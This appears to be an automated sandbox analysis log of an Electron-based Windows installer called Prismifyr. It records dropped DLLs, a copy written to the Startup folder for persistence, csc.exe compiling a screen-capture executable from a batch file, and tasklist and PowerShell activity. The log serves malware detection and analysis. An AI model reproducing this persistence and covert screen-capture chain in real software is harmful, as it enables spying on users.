Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /fo csv
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7b4c3a21-e2df-5efd-beb5-591edeb53a62 Jump to behavior
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe Static file information: File size 98394400 > 1048576
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: "ProgramDataBaseFileName": "$(IntDir)vc90b.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: "$(IntDir)$(ProjectName)\\vc80.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2475862062.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476010965.0000000002E0F000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476074048.0000000002E12000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: # the .pdb by the precompiled header step for .cc and the compilation of source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: - Use '<(PRODUCT_DIR)/<(product_name).(exe|dll).pdb' if 'product_name' is source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: CLEANFILES="$CLEANFILES *.lib *.dll *.pdb *.exp" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: - Use '<(PRODUCT_DIR)/<(target_name).(exe|dll).pdb'. source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;; source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2397315857.0000000005223000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: config_name, self.ExpandSpecial, output + ".pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: # See comment at cc_command for why there's two .pdb files. source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2278954943.0000000006B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pdb = self.GetPDBName(config, expand_special, output_name + ".pdb") source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pdbpath_c = pdbpath + ".c.pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: "ProgramDataBaseFileName": "$(IntDir)\\vc90b.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ** rbu_file.pDb!=0, then it is assumed to already be present on the source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2395663067.0000000005221000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdbpath_cc = pdbpath + ".cc.pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: "ProgramDatabaseFile": "Flob.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\electron.exe.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdbGCTL source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2395663067.0000000005221000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdb_base = "{}.{}.pdb".format(pdb_base, TARGET_TYPE_EXT[target_dict["type"]]) source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461234245.0000000000849000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ** for all file descriptors with rbu_file.pDb!=0. If the argument has source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: config_name, self.ExpandSpecial, output + ".pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ** rbu_file.pDb!=0. source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2388748403.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392116421.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2388942202.00000000055C0000.00000004.00001000.00020000.00000000.sdmp
Compiles C# or VB.Net code
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
PE file contains sections with non-standard names
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .retplne
Source: vk_swiftshader.dll.0.dr Static PE information: section name: _RDATA
Source: vulkan-1.dll.0.dr Static PE information: section name: .gxfg
Source: vulkan-1.dll.0.dr Static PE information: section name: .retplne
Source: vulkan-1.dll.0.dr Static PE information: section name: _RDATA
Source: ffmpeg.dll.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr Static PE information: section name: _RDATA
Source: libEGL.dll.0.dr Static PE information: section name: .gxfg
Source: libEGL.dll.0.dr Static PE information: section name: .retplne
Source: libEGL.dll.0.dr Static PE information: section name: _RDATA
Source: libGLESv2.dll.0.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll.0.dr Static PE information: section name: .retplne
Source: libGLESv2.dll.0.dr Static PE information: section name: _RDATA
Source: Prismifyr_Installer_v2.1.exe.0.dr Static PE information: section name: .gxfg
Source: Prismifyr_Installer_v2.1.exe.0.dr Static PE information: section name: .retplne
Source: Prismifyr_Installer_v2.1.exe.0.dr Static PE information: section name: .rodata
Source: Prismifyr_Installer_v2.1.exe.0.dr Static PE information: section name: CPADinfo
Source: Prismifyr_Installer_v2.1.exe.0.dr Static PE information: section name: LZMADEC
Source: Prismifyr_Installer_v2.1.exe.0.dr Static PE information: section name: _RDATA
Source: Prismifyr_Installer_v2.1.exe.0.dr Static PE information: section name: malloc_h
Source: Prismifyr_Installer_v2.1.exe.0.dr Static PE information: section name: prot
Source: ffmpeg.dll0.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll0.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll0.0.dr Static PE information: section name: _RDATA
Source: libEGL.dll0.0.dr Static PE information: section name: .gxfg
Source: libEGL.dll0.0.dr Static PE information: section name: .retplne
Source: libEGL.dll0.0.dr Static PE information: section name: _RDATA
Source: libGLESv2.dll0.0.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll0.0.dr Static PE information: section name: .retplne
Source: libGLESv2.dll0.0.dr Static PE information: section name: _RDATA
Source: Prismifyr_Installer_v2.1.exe0.0.dr Static PE information: section name: .gxfg
Source: Prismifyr_Installer_v2.1.exe0.0.dr Static PE information: section name: .retplne
Source: Prismifyr_Installer_v2.1.exe0.0.dr Static PE information: section name: .rodata
Source: Prismifyr_Installer_v2.1.exe0.0.dr Static PE information: section name: CPADinfo
Source: Prismifyr_Installer_v2.1.exe0.0.dr Static PE information: section name: LZMADEC
Source: Prismifyr_Installer_v2.1.exe0.0.dr Static PE information: section name: _RDATA
Source: Prismifyr_Installer_v2.1.exe0.0.dr Static PE information: section name: malloc_h
Source: Prismifyr_Installer_v2.1.exe0.0.dr Static PE information: section name: prot
Source: Prismifyr_Installer_v2.1.exe.5.dr Static PE information: section name: .gxfg
Source: Prismifyr_Installer_v2.1.exe.5.dr Static PE information: section name: .retplne
Source: Prismifyr_Installer_v2.1.exe.5.dr Static PE information: section name: .rodata
Source: Prismifyr_Installer_v2.1.exe.5.dr Static PE information: section name: CPADinfo
Source: Prismifyr_Installer_v2.1.exe.5.dr Static PE information: section name: LZMADEC
Source: Prismifyr_Installer_v2.1.exe.5.dr Static PE information: section name: _RDATA
Source: Prismifyr_Installer_v2.1.exe.5.dr Static PE information: section name: malloc_h
Source: Prismifyr_Installer_v2.1.exe.5.dr Static PE information: section name: prot
Source: d9f7e9ec-5589-4098-b546-c97c7020ff02.tmp.node.5.dr Static PE information: section name: _RDATA
Source: 1b6e99aa-5e17-4930-922d-0fcfed46e003.tmp.node.5.dr Static PE information: section name: _RDATA
Drops PE files
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\vulkan-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\libGLESv2.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\StdUtils.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\elevate.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File created: C:\Users\user\AppData\Local\Temp\d9f7e9ec-5589-4098-b546-c97c7020ff02.tmp.node Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\nsExec.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\nsis7z.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File created: C:\Users\user\AppData\Local\Temp\1b6e99aa-5e17-4930-922d-0fcfed46e003.tmp.node Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\SpiderBanner.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\ffmpeg.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\Prismifyr_Installer_v2.1.exe Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\vk_swiftshader.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\ffmpeg.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File created: C:\Users\user\AppData\Local\Temp\d9f7e9ec-5589-4098-b546-c97c7020ff02.tmp.node Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File created: C:\Users\user\AppData\Local\Temp\1b6e99aa-5e17-4930-922d-0fcfed46e003.tmp.node Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\LICENSE.electron.txt Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\LICENSE.electron.txt Jump to behavior

Boot Survival
barindex
Drops PE files to the startup folder
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
